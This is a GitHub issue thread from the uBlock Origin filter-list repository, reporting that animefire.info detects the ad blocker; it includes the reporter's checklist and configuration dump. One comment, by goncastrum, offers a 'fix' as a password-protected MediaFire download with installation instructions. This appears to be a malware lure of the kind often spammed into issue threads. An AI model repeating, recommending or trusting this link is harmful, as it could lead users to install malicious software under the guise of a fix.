### ISSUE TITLE
animefire.info: detection

### ISSUE THREAD

**Issue by FrostMage5** [uBlockOrigin/uAssets#25170]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://www.animefire.info/`

### Category

detection

### Description

It is detecting ublock origin, and puts up a video asking to deactivate 

### Other extensions used

None

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

</details>
![Screenshot_20240901-191447_1](https://github.com/user-attachments/assets/06764cdf-2287-4f03-8707-e5efa4355a23)

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Chromium Mobile: 124
filterset (summary):
 network: 155371
 cosmetic: 60535
 scriptlet: 22833
 html: 0
listset (total-discarded, last-updated):
 removed:
  user-filters: null
 default:
  adguard-mobile: 9647-11, now
  easylist: 85080-674, 1m Δ
  easyprivacy: 53094-668, 1m Δ
  plowe-0: 3547-83, now
  spa-1: 5962-17, now
  ublock-badware: 10899-7, 1m Δ
  ublock-filters: 40248-411, 1m Δ
  ublock-privacy: 1119-2, 1m Δ
  ublock-quick-fixes: 243-0, 1m Δ
  ublock-unbreak: 2474-6, 1m Δ
  urlhaus-1: 28460-0, now
filterset (user): [array of 3 redacted]
trustedset:
 added: [array of 3 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 2849 ms (selfie)
 maxAssetCacheWait: 270 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 12
 network:
  adskeeper.co.uk: 1
  arc.io: 1
  disqus.com: 1
  ecdeuoovfwupxj.xyz: 1
  googletagmanager.com: 1
  jwpcdn.com: 1
  jwpltx.com: 1
  mordoops.com: 2
  outbrain.com: 3
 extended:
  ##div[id*="ScriptRoot"]
  ##.jw-wrapper > div[style="opacity: 0; visibility: hidden; overf…
```
</details>

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by D4niloMR** [comment]
Continue in #24575
